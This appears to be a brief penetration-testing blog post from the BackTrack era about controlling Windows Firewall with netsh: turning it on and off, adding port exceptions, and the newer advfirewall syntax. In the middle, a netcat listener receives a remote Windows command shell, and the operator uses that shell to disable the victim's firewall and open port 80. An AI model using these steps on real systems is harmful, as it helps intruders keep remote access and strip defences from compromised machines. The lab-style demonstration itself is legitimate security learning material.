control – windows firewall from the command line

Enabling Windows Firewall
Netsh firewall set opmode enable

Disabling Windows Firewall
Netsh firewall set opmode disable

Bellow shows accessing Windows from backtrack using ncat more can be read on ncat

http://www.myexploit.wordpress.com/control-netcat/

root@bt:~# nc -lvvp 80
listening on [any] 80 …
IP-Address: inverse host lookup failed: Unknown server error : Connection timed out
connect to [IP-Address] from (UNKNOWN) [IP-Address] 1050
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test>Netsh firewall set opmode disable
Netsh firewall set opmode disable
Ok.

To allow an Exception to the Firewall (Add port access for outside access in)
netsh firewall add portopening UDP 8080 test enable

netsh firewall add portopening TCP 80 HTTPTest enable

C:\Documents and Settings\test>netsh firewall add portopening TCP 80 HTTPTest enable
netsh firewall add portopening TCP 80 HTTPTest enable
Ok.

Testing http access in is allowed

root@bt:~# telnet IP-Address 80
Trying IP-Address…
Connected to IP-Address.
Escape character is ‘^]’.
get
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.1
Date: Wed, 06 Jun 2011 14:36:04 GMT
Content-Type: text/html
Content-Length: 87

<html><head><title>Error</title></head><body>The parameter is incorrect. </body></html>Connection closed by foreign host.

C:\win7>Netsh firewall set opmode enable

IMPORTANT: Command executed successfully.
However, “netsh firewall” is deprecated;
use “netsh advfirewall firewall” instead.
For more information on using “netsh advfirewall firewall” commands
instead of “netsh firewall”, see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

Ok.

Updates for Win7

Enable FW
netsh advfirewall set currentprofile state on

netsh advfirewall set currentprofile state off

Allow Port 80 inwards
netsh advfirewall firewall add rule name=”Open Port 80″ dir=in action=allow protocol=TCP localport=80